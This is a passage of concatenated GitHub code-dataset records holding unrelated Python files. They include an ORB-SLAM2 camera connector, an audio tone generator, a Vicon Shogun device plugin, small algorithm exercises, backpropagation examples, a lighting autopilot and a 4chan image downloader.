None\n\n try:\n data = self.socket.recv()\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功接收\n if self.offline:\n print('orbslam2_connector: found offline when recv data')\n return False, None\n\n if len(data) != 76:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n mtype = np.frombuffer(data[0:4], np.int32)[0]\n slam_status = np.frombuffer(data[4:8], np.int32)[0]\n rel_mat = np.frombuffer(data[8:72], np.float32).reshape([4, 4])\n restart_count = np.frombuffer(data[72:76], np.int32)[0]\n\n if mtype != 1:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n if slam_status != self._SLAM_OK:\n print('SLAM is not OK')\n return False, None\n\n return restart_count, rel_mat\n\n def get_restart_count(self):\n pass\n\n def get_status(self):\n pass\n\n\nif __name__ == '__main__':\n osc = OrbSlam2Connector()\n cam1 = imageio.get_reader('', size=(1280, 720))\n cam2 = imageio.get_reader('', size=(1280, 720))\n\n # 读取相机参数\n stereo_cam_params_file = 'stereo_cam_params_imx322_1280x720.yml'\n f = cv2.FileStorage(stereo_cam_params_file, cv2.FILE_STORAGE_READ)\n matL = 
f.getNode('LM').mat()\n distL = f.getNode('LD').mat()\n matR = f.getNode('RM').mat()\n distR = f.getNode('RD').mat()\n R = f.getNode('R').mat()\n T = f.getNode('T').mat()\n hw = np.array([720, 1280])\n f.release()\n\n # 设定立体矩阵\n wh = tuple(hw[::-1])\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = \\\n cv2.stereoRectify(matL, distL, matR, distR,\n wh, R, T, flags=cv2.CALIB_ZERO_DISPARITY, alpha=-1, newImageSize=wh)\n\n mapL1, mapL2 = cv2.initUndistortRectifyMap(matL, distL, R1, P1, wh, cv2.CV_16SC2)\n mapR1, mapR2 = cv2.initUndistortRectifyMap(matR, distR, R2, P2, wh, cv2.CV_16SC2)\n\n while True:\n imgL = cam1.get_next_data()\n imgR = cam2.get_next_data()\n\n imgL = cv2.rotate(imgL, cv2.ROTATE_180)\n imgR = cv2.rotate(imgR, cv2.ROTATE_180)\n\n # 校畸\n imgL = cv2.remap(imgL, mapL1, mapL2, cv2.INTER_LINEAR)\n imgR = cv2.remap(imgR, mapR1, mapR2, cv2.INTER_LINEAR)\n # imgL = cv2.resize(imgL, (640, 360), cv2.INTER_AREA)\n # imgR = cv2.resize(imgR, (640, 360), cv2.INTER_AREA)\n\n imgLR = np.concatenate([imgL, imgR], 1)\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n im_show = cv2.cvtColor(imgLR, cv2.COLOR_RGB2BGR)\n cv2.imshow('view', im_show)\n s, m = osc.get_pos(imgLR)\n print(s)\n cv2.waitKey(1000//30)\n\n","repo_name":"One-sixth/smart_car","sub_path":"orbslam2_connector.py","file_name":"orbslam2_connector.py","file_ext":"py","file_size_in_byte":5360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21457611523","text":"# import time\n# import math\n# import pyaudio\n# from cffi.backend_ctypes import xrange\n#\n#\n# class Beeper(object):\n#\n# def __init__(self, **kwargs):\n# self.bitrate = kwargs.pop('bitrate', 16000)\n# self.channels = kwargs.pop('channels', 1)\n# self._p = pyaudio.PyAudio()\n# self.stream = self._p.open(\n# format = self._p.get_format_from_width(1),\n# channels = self.channels,\n# rate = self.bitrate,\n# output = True,\n# )\n# self._queue = []\n#\n# def __enter__(self):\n# return self\n#\n# def __exit__(self, exc_type, exc_val, exc_tb):\n# self.stream.stop_stream()\n# self.stream.close()\n#\n# def tone(self, frequency, length=1000, play=False, **kwargs):\n#\n# number_of_frames = int(self.bitrate * length / 1000.)\n#\n# record = False\n# x = 0\n# y = 0\n# while 1:\n# x += 1\n# v = math.sin(x / ((self.bitrate / float(frequency)) / math.pi))\n#\n# # Find where the sin tip starts.\n# if round(v, 3) == +1:\n# record = True\n#\n# if record:\n# self._queue.append(chr(int(v * 127 + 128)))\n# y += 1\n# if y > number_of_frames and round(v, 3) == +1:\n# # Always end on the high tip of the sin wave to clips align.\n# break\n#\n# def play(self):\n# sound = ''.join(self._queue)\n# self.stream.write(sound)\n# time.sleep(0.1)\n#\n#\n# with Beeper(bitrate=88000, channels=2) as beeper:\n# i = 0\n# for f in xrange(1000, 800-1, int(round(-25/2.))):\n# i += 1\n# length = math.log(i + 1) * 250 / 2. 
/ 2.\n# beeper.tone(frequency=f, length=int(length))\n# beeper.play()\n\nimport numpy\nimport pyaudio\nimport math\nimport random\n\n\ndef sine(frequency, length, rate):\n length = int(length * rate)\n factor = float(frequency) * (math.pi * 2) / rate\n waveform = numpy.sin(numpy.arange(length) * factor)\n return waveform\n\n\ndef play_tone(stream, frequency, length, rate=44100):\n chunks = [sine(frequency, length, rate)]\n\n chunk = numpy.concatenate(chunks) * 0.25\n\n fade = 200\n\n fade_in = numpy.arange(0., 1., 1 / fade)\n fade_out = numpy.arange(1., 0., -1 / fade)\n\n chunk[:fade] = numpy.multiply(chunk[:fade], fade_in)\n chunk[-fade:] = numpy.multiply(chunk[-fade:], fade_out)\n\n stream.write(chunk.astype(numpy.float32).tostring())\n\n\ndef bassline():\n frequency = 300\n for i in range(1000000):\n play_tone(stream, frequency, .15)\n change = random.choice([-75, -75, -10, 10, 2, 3, 100, -125])\n print (frequency)\n if frequency < 0:\n frequency = random.choice([100, 200, 250, 300])\n else:\n frequency = frequency + change\n\nif __name__ == '__main__':\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,\n channels=1, rate=44100, output=4)\n\nbassline()","repo_name":"Andrew-Garanin/AudioDigitalFiltering","sub_path":"beeper.py","file_name":"beeper.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71710088730","text":"\n\nimport random\n\ndef classes(room_dim, periods):\n#room_dim = list of room dimensions for each room (e.g. seat length x seat width)\n#periods = number of time periods (student has n periods (classes) a day)\n\n #determine number of students (seats) in each room\n room_size = []\n for n in room_dim: #for each set of dim in room_dim\n room_size.append(n[0] * n[1]) #size = r * c\n\n #determine total number of students, generate list of students\n num_students = sum(room_size) #total number of students\n students = range(num_students) #list of student numbers\n\n #assign students to classes\n class_list = []\n for i in range(periods): #repeats for each period\n random.shuffle(students) #shuffle list of students randomly\n\n d = 0\n for n in room_size:\n class_list.append(students[d:d + n]) #increments of students depending on room size\n d += n #keeps track of start of block, depending on size of previous room\n\n return(class_list) #class list includes lists of each class, repeated for different periods\n\nprint(classes([[1,2],[3,4]], 2)) #example\n\n###Notes:\n #Need to figure out how to implement student object with determining neighbors\n #Class list is a list, need to change back to array based on room dim to figure out neighbors\n\n","repo_name":"zackmcnulty/math_381_project","sub_path":"project-381-master/scratchwork-code/class-assignments.py","file_name":"class-assignments.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34367335866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n@author: Jeff Gould\n\n@description: file operation functions for black lists.\n'''\n\n#from functions import var\nfrom functions import *\n\n\n\n\ndef file_ops(df, server):\n\n named_full_log = server + full_log\n named_ip = server + ip\n named_ok = server + ok\n named_reject = server + reject\n flog = os.path.join(created_logs_dir, named_full_log)\n fip = os.path.join(created_logs_dir, named_ip)\n fok = os.path.join(created_logs_dir, named_ok)\n 
freject = os.path.join(created_logs_dir, named_reject)\n\n try:\n # create csv of all relevant columns\n df.to_csv(flog, index=False)\n\n # create csv of unique Ip address' and the frequency they appear\n ip_count = pd.DataFrame(columns=['IP', 'Frequency'])\n ip_count.IP = df.IP\n ip_count = ip_count.groupby('IP').agg({'Frequency': len})\n ip_count = ip_count.sort_values(by=['Frequency'], ascending=False)\n\n ip_count.to_csv(fip, index=True)\n\n # create csv of all OK request code 200\n ip_ok = df.loc[df.Code == 200]\n ip_ok.to_csv(fok, index=False)\n\n # create csv of all rejected request not code 200\n ip_rej = df.loc[df.Code != 200]\n ip_rej.to_csv(freject, index=False)\n\n logging.info(\"From file_ops() CSV's have been Created\")\n\n\n except Exception as e:\n logging.error('From file_ops()' + str(e))\n","repo_name":"Gould25/IPprojoct3113","sub_path":"functions/io_ops.py","file_name":"io_ops.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27921404535","text":"from switchboard.config import CONFIG, Setting\nfrom switchboard.devices.device_base import Device, DeviceStatus\nfrom switchboard.devices.device_widget_base import DeviceWidget\nfrom switchboard.switchboard_logging import LOGGER\nimport switchboard.switchboard_utils as utils\n\nfrom PySide2 import QtWidgets\nfrom .thirdparty.vicon_core_api import vicon_core_api\nfrom .thirdparty.shogun_live_api import shogun_live_api\n\nimport datetime\nfrom functools import wraps\n\n\ndef unresponsive_shogun(f):\n \"\"\"\n Decorator to gracefully disconnect if a Shogun command comes back with vicon_core_api.client.RPCError\n \"\"\"\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except vicon_core_api.client.RPCError:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n return None\n except ModuleNotFoundError:\n LOGGER.error('Could not connect to Shogun because the module was not installed')\n return None\n\n return wrapped\n\n\nclass DeviceShogun(Device):\n def __init__(self, name, ip_address, **kwargs):\n self.setting_save_path = Setting(\"save_path\", \"Save Path\", \"\")\n super().__init__(name, ip_address, **kwargs)\n\n self.trigger_start = True\n self.trigger_stop = True\n\n self.client = None\n\n self._slate = 'slate'\n self._take = 1\n\n def device_settings(self):\n return super().device_settings() + [self.setting_save_path]\n\n @property\n def save_path(self):\n return self.setting_save_path.get_value()\n\n @save_path.setter\n @unresponsive_shogun\n def save_path(self, value):\n if self.setting_save_path.get_value() == value:\n return\n\n self.setting_save_path.update_value(value)\n\n self.set_capture_folder()\n\n @unresponsive_shogun\n def connect_listener(self):\n super().connect_listener()\n\n self.client = vicon_core_api.Client(self.ip_address)\n self.capture_service = shogun_live_api.CaptureServices(self.client)\n\n if self.client.connected:\n self.status = DeviceStatus.READY\n self.set_capture_folder()\n else:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n\n\n @unresponsive_shogun\n def set_slate(self, value):\n self._slate = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_take(self, value):\n self._take = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_capture_folder(self):\n d = 
datetime.date.today()\n\n save_path = d.strftime(self.save_path)\n\n # HOW TO MAKE DIR ON OTHER MACHINE\n #os.makedirs(save_path, exist_ok=True)\n\n result = self.capture_service.set_capture_folder(save_path)\n\n if result != vicon_core_api.result.Result.Ok:\n LOGGER.error(f'{self.name}: \"{save_path}\" is an invalid path. Capture Folder not set')\n\n @unresponsive_shogun\n def record_start(self, slate, take, description):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_start:\n return\n\n self.set_slate(slate)\n self.set_take(take)\n\n result, _ = self.capture_service.start_capture()\n\n if result == vicon_core_api.result.Result.Ok:\n self.record_start_confirm(self.timecode())\n\n @unresponsive_shogun\n def record_stop(self):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_stop:\n return\n\n result = self.capture_service.stop_capture(0)\n\n import time\n time.sleep(3)\n\n if result == vicon_core_api.result.Result.Ok:\n # TODO: THIS BLOCKS THE MAIN THREAD ON STOP. FIX THIS\n result, _, _ = self.capture_service.latest_capture_file_paths()\n # START HERE: GET PATHS OF FILES WRITTEN\n #LOGGER.debug(f'{result} {paths}')\n self.record_stop_confirm(self.timecode(), paths=None)\n\n def timecode(self):\n return '00:00:00:00'\n\n\nclass DeviceWidgetShogun(DeviceWidget):\n def __init__(self, name, device_hash, ip_address, icons, parent=None):\n super().__init__(name, device_hash, ip_address, icons, parent=parent)\n\n def _add_control_buttons(self):\n super()._add_control_buttons()\n self.trigger_start_button = self.add_control_button(':/icons/images/icon_trigger_start_disabled.png',\n icon_hover=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled=':/icons/images/icon_trigger_start_disabled.png',\n icon_on=':/icons/images/icon_trigger_start.png',\n icon_hover_on=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_start_disabled.png',\n tool_tip='Trigger when recording starts',\n checkable=True, checked=True)\n\n self.trigger_stop_button = self.add_control_button(':/icons/images/icon_trigger_stop_disabled.png',\n icon_hover=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled=':/icons/images/icon_trigger_stop_disabled.png',\n icon_on=':/icons/images/icon_trigger_stop.png',\n icon_hover_on=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_stop_disabled.png',\n tool_tip='Trigger when recording stops',\n checkable=True, checked=True)\n\n self.connect_button = self.add_control_button(':/icons/images/icon_connect.png',\n icon_hover=':/icons/images/icon_connect_hover.png',\n icon_disabled=':/icons/images/icon_connect_disabled.png',\n icon_on=':/icons/images/icon_connected.png',\n icon_hover_on=':/icons/images/icon_connected_hover.png',\n icon_disabled_on=':/icons/images/icon_connected_disabled.png',\n tool_tip='Connect/Disconnect from listener')\n\n self.trigger_start_button.clicked.connect(self.trigger_start_clicked)\n self.trigger_stop_button.clicked.connect(self.trigger_stop_clicked)\n self.connect_button.clicked.connect(self.connect_button_clicked)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n def trigger_start_clicked(self):\n if self.trigger_start_button.isChecked():\n self.signal_device_widget_trigger_start_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_start_toggled.emit(self, False)\n\n def trigger_stop_clicked(self):\n if self.trigger_stop_button.isChecked():\n 
self.signal_device_widget_trigger_stop_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_stop_toggled.emit(self, False)\n\n def connect_button_clicked(self):\n if self.connect_button.isChecked():\n self._connect()\n else:\n self._disconnect()\n\n def _connect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(True)\n\n # Enable the buttons\n self.trigger_start_button.setDisabled(False)\n self.trigger_stop_button.setDisabled(False)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_connect.emit(self)\n\n def _disconnect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(False)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_disconnect.emit(self)\n","repo_name":"chenyong2github/UnrealEngine","sub_path":"Engine/Plugins/VirtualProduction/Switchboard/Source/Switchboard/switchboard/devices/shogun/plugin_shogun.py","file_name":"plugin_shogun.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"30018700517","text":"\ndef larger_than_right(lst):\n y = max(lst)\n g = lst.index(y)\n newlist = lst[g:]\n newerList = []\n for i,v in enumerate(newlist[:-1]):\n if v > max(newlist[i+1:]):\n newerList.append(v)\n \n if len(newlist) > 1:\n if newlist[-2] > newlist[-1]:\n newerList.append(newlist[-1])\n \n if len(newerList) == 0:\n newerList.append(y)\n \n return newerList\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vC4P2jGR6wxED7MBL_15.py","file_name":"vC4P2jGR6wxED7MBL_15.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42503130578","text":"\n# O-\n# /\n# O - O-\n# \\ \n# O-\n\nimport numpy as np\n\ndvalues=np.array([[1.,1.,1.],\n [2.,2.,2.],\n [3.,3.,3.]])\n\nweights=np.array([[1.2,-2.4,-1.3,-4.2],\n [2.4,2.1,-5.2,4.8],\n [-1.1,1.8,6.1,-2.3]]).T\n\ndx0=sum(weights[0]*dvalues[0])\ndx1=sum(weights[1]*dvalues[0])\ndx2=sum(weights[2]*dvalues[0])\ndx3=sum(weights[3]*dvalues[0])\ndinputs=np.array([dx0,dx1,dx2,dx3])\n\n# print(dinputs)\n\ndinputs=np.dot(dvalues,weights.T)\n# print(\"dinputs\\n\",dinputs)\n\ninputs=np.array([[1.2,3.1,1.2,3.1],\n [3.2,5.2,6.7,1.7],\n [4.2,6.3,1.2,6.6]])\n\ndweights=np.dot(inputs.T,dvalues)\n# print(\"dweights\\n\",dweights)\n\ndbias=np.sum(dvalues,axis=0,keepdims=True)\n# print(\"dbias\\n\",dbias)\n\nbias=[1,1,1]\n\nz=np.dot(inputs,weights)+bias\n\ndrelu=np.zeros_like(z)\ndrelu[z>0]=1\ndrelu*=dvalues\n# print(\"drelu\\n\",drelu)\n\n# optimizing drelu calculation\ndrelu=dvalues.copy()\ndrelu[z<=0]=0\n# print(drelu)\n\n# MINIMIZING RELU OUTPUT\noutput=np.dot(inputs,weights)+bias\noutput=np.maximum(output,0)\nprint(output)\ndrelu=output.copy()\ndrelu[output<=0]=0\ndinput=np.dot(drelu,weights.T)\ndweights=np.dot(inputs.T,drelu)\ndbias=np.sum(output,axis=0,keepdims=True)\nweights -= 0.001*dweights\nbias -= 0.001*dbias\nprint(\"minimized output\\n\",np.maximum(np.dot(inputs,weights)+bias,0))\n","repo_name":"Pointdexter16/Neural-Network-concepts-from-scatch-in-python","sub_path":"9.Backpropagation_layer_of_neurons.py","file_name":"9.Backpropagation_layer_of_neurons.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
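The record above ends by hand-deriving the backward pass for a single dense layer followed by a ReLU. A minimal, self-contained sketch of the same technique follows, under illustrative assumptions: the input matrix, the seeded random weights, and the 0.001 learning rate are toy values chosen for demonstration, not values taken from any record. The chain-rule steps are: zero the upstream gradient wherever the pre-activation was non-positive (the ReLU derivative), then dinputs = drelu @ W.T, dweights = X.T @ drelu, and dbias = the column-sum of the masked gradient drelu.

import numpy as np

# Toy setup: 3 samples, 4 input features, 3 neurons.
# All concrete values here are illustrative assumptions.
rng = np.random.default_rng(0)
inputs = np.array([[1.2, 3.1, 1.2, 3.1],
                   [3.2, 5.2, 6.7, 1.7],
                   [4.2, 6.3, 1.2, 6.6]])       # shape (3, 4)
weights = rng.standard_normal((4, 3))           # shape (4, 3)
bias = np.zeros((1, 3))

# Forward pass: dense layer, then ReLU.
z = inputs @ weights + bias                     # pre-activation, shape (3, 3)
output = np.maximum(z, 0)

# Upstream gradient dL/d(output); all ones keeps the example simple.
dvalues = np.ones_like(output)

# ReLU derivative: the gradient is zeroed wherever the pre-activation was <= 0.
drelu = dvalues.copy()
drelu[z <= 0] = 0

# Chain rule through the dense layer.
dinputs = drelu @ weights.T                     # dL/d(inputs),  shape (3, 4)
dweights = inputs.T @ drelu                     # dL/d(weights), shape (4, 3)
dbias = drelu.sum(axis=0, keepdims=True)        # dL/d(bias),    shape (1, 3)

# One plain gradient-descent step.
weights -= 0.001 * dweights
bias -= 0.001 * dbias

Note that the bias gradient sums the ReLU-masked gradient drelu rather than the layer output itself; summing activations would not follow from the chain rule.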
+{"seq_id":"15485254601","text":"\"\"\"\n动态规划\nhttps://leetcode.cn/problems/house-robber/description/?envType=study-plan-v2&envId=leetcode-75\n你是一个专业的小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,影响你偷窃的唯一制约因素就是相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。\n\n给定一个代表每个房屋存放金额的非负整数数组,计算你 不触动警报装置的情况下 ,一夜之内能够偷窃到的最高金额。\n\n\n示例 1:\n\n输入:[1,2,3,1]\n输出:4\n解释:偷窃 1 号房屋 (金额 = 1) ,然后偷窃 3 号房屋 (金额 = 3)。\n 偷窃到的最高金额 = 1 + 3 = 4 。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # if len(nums) == 0:\n # return 0\n\n # 分解成子问题\n \"\"\"\n f(k) = 偷[0..k)房间的最大金额\n f(0) = 0\n f(1) = nums[0]\n f(k) = max { rob(k-1), rob(k-2) + nums[k-1]}\n \"\"\"\n\n # n = len(nums)\n # dp = [0] * (n + 1)\n # dp[0] = 0\n # dp[1] = nums[0]\n pre = 0\n cur = 0\n # for i in range(2, n + 1):\n for i in nums:\n pre, cur = cur, max(cur,i+pre)\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i - 1])\n return cur\n\n\nif __name__ == '__main__':\n res = Solution().rob([1, 3, 4, 6])\n print(res)\n","repo_name":"ChenZixinn/leetcode","sub_path":"medium/动态规划/198_打家劫舍.py","file_name":"198_打家劫舍.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3608711009","text":"# Implement strStr().\n\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\n# Example 1:\n\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n\ndef strStr(haystack, needle):\n if not needle:\n return 0\n if needle not in haystack:\n return -1\n else:\n w = haystack.index(needle)\n\n return w\n\nhaystack = \"maxwell\"\nneedle = \"we\"\n\nprint(strStr(haystack,needle))","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/strStr_28.py","file_name":"strStr_28.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34616370508","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom loguru import logger # type:ignore\nfrom ravelights.core.bpmhandler import BeatStatePattern\nfrom ravelights.core.colorhandler import Color, ColorHandler\nfrom ravelights.core.device import Device\nfrom ravelights.core.settings import Settings\nfrom ravelights.core.utils import p\n\nif TYPE_CHECKING:\n from ravelights.core.ravelights_app import RaveLightsApp\n\n\n@dataclass\nclass AutoPilot:\n \"\"\"\n autopilot_loop_length [in beats]: randomized is called every n beats\n \"\"\"\n\n root: \"RaveLightsApp\"\n\n def __post_init__(self) -> None:\n self.settings: Settings = self.root.settings\n self.devices: list[Device] = self.root.devices\n\n self.settings.settings_autopilot = dict(\n autopilot=False,\n autopilot_loop_length=4,\n renew_pattern=True,\n p_renew_pattern=0.1, # use in timeline genselector\n renew_pattern_sec=True,\n p_renew_pattern_sec=0.1, # use in timeline genselector\n renew_vfilter=True,\n p_renew_vfilter=0.1, # use in timeline genselector\n renew_thinner=True,\n p_renew_thinner=0.1, # use in timeline genselector\n renew_dimmer=True,\n p_renew_dimmer=0.1, # use in timeline genselector\n color_primary=True,\n p_color_primary=0.1,\n timeline=True,\n p_timeline=0.1,\n alternate_pattern=True,\n p_alternate_pattern=0.1, # run on every item in selected seperately\n alternate_pattern_sec=True,\n p_alternate_pattern_sec=0.1, # run on every item in selected seperately\n 
triggers=True,\n p_triggers=0.1, # run on every item in selected seperately\n )\n\n def get_autopilot_controls(self):\n controls_autopilot = [\n dict(type=\"toggle\", name_toggle=\"autopilot\"),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern\",\n name_slider=\"p_renew_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern_sec\",\n name_slider=\"p_renew_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_vfilter\",\n name_slider=\"p_renew_vfilter\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_dimmer\",\n name_slider=\"p_renew_dimmer\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_thinner\",\n name_slider=\"p_renew_thinner\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"color_primary\",\n name_slider=\"p_color_primary\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"timeline\",\n name_slider=\"p_timeline\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern\",\n name_slider=\"p_alternate_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern_sec\",\n name_slider=\"p_alternate_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"triggers\",\n name_slider=\"p_triggers\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(type=\"slider\", name_slider=\"autopilot_loop_length\", range_min=4, range_max=32, step=4, markers=True),\n ]\n return controls_autopilot\n\n def get_color_palette(self):\n # ─── Add Controls Color Palette ───────────────────────────────\n n_colors = 11\n controls_color_palette = [\n ColorHandler.get_color_from_hue(hue) for hue in np.linspace(0, 1, n_colors + 1)[:-1]\n ] + [Color(1, 1, 1)]\n return [f\"rgb({int(r*255)},{int(g*255)},{int(b*255)})\" for (r, g, b) in controls_color_palette]\n\n def randomize(self) -> None:\n \"\"\"Called every frame to randomize parameters within ravelights app.\"\"\"\n\n if not self.settings.settings_autopilot[\"autopilot\"]:\n return None\n\n beat_pattern = BeatStatePattern(loop_length=self.settings.settings_autopilot[\"autopilot_loop_length\"])\n if not beat_pattern.is_match(self.settings.beat_state):\n return None\n\n logger.info(\"run randomize routine\")\n\n # ─── Colors ───────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"color_primary\"]:\n if p(self.settings.settings_autopilot[\"p_color_primary\"]):\n random_color = ColorHandler.get_random_color()\n logger.info(\"set new color_primary\")\n self.settings.color_engine.set_color_with_rule(color=random_color, color_key=\"A\")\n\n # ─── Triggers ─────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"triggers\"]:\n for gen_type in [\"pattern\", \"pattern_sec\", \"vfilter\", \"dimmer\", \"thinner\"]:\n for timeline_level in range(1, 4): # levels 1 to 4\n if p(self.settings.settings_autopilot[\"p_triggers\"]):\n logger.info(f\"renew_trigger {gen_type} 
{timeline_level}\")\n self.settings.renew_trigger(gen_type=gen_type, timeline_level=timeline_level)\n","repo_name":"danuo/chromalights","sub_path":"src/ravelights/core/autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40298769548","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport urllib\r\nimport re\r\nimport os\r\nimport sys\r\n\r\ndef get_soup(url):\r\n return BeautifulSoup(requests.get(url).text, \"lxml\")\r\n\r\ndef get_main_page(board):\r\n return get_soup(\"http://boards.4chan.org/{}/\".format(board))\r\n\r\ndef get_thread_page(board, thread_id):\r\n return get_soup(\"http://boards.4chan.org/{}/res/{}\".format(board, thread_id))\r\n\r\ndef get_thread_ids(board):\r\n main_page = get_main_page(board)\r\n thread_ids = []\r\n for link in main_page.find_all(\"a\", class_=\"replylink\"):\r\n thread_ids.append(link[\"href\"][1:])\r\n return thread_ids\r\n\r\ndef get_image_urls(thread_id):\r\n thread_page = get_thread_page(\"g\", thread_id)\r\n image_urls = []\r\n for post in thread_page.find_all(\"div\", class_=\"postContainer\"):\r\n for link in post.find_all(\"a\"):\r\n if link.has_attr(\"href\") and link[\"href\"].endswith(\"jpg\"):\r\n image_urls.append(link[\"href\"])\r\n return image_urls\r\n\r\ndef download_image(url, filename):\r\n print (\"Downloading {} to {}\".format(url, filename))\r\n urllib.urlretrieve(url, filename)\r\n\r\ndef download_images(board):\r\n thread_ids = get_thread_ids(board)\r\n for thread_id in thread_ids:\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n print (\"Usage: python 4chan.py []\")\r\n sys.exit(1)\r\n board = sys.argv[1]\r\n if len(sys.argv) > 2:\r\n thread_id = sys.argv[2]\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n else:\r\n download_images(board)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LeoEkky/OpenAI-Codex-Code-Generation","sub_path":"4chan search.py","file_name":"4chan search.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"74922126492","text":"import json as json_module\nfrom typing import List, Union, Optional, Dict\nfrom ctypes import c_void_p, c_char, c_char_p, byref, POINTER, create_string_buffer\n\nfrom ._object import Object\nfrom ._library import yogi_core\nfrom ._json_view import JsonView\nfrom ._enums import ConfigurationFlags, CommandLineOptions\n\n\nclass Configuration(Object):\n \"\"\"Stores program parameters from different sources.\n\n A configuration represents a set of parameters that usually remain constant\n throughout the runtime of a program. Parameters can come from different\n sources such as the command line or a file. 
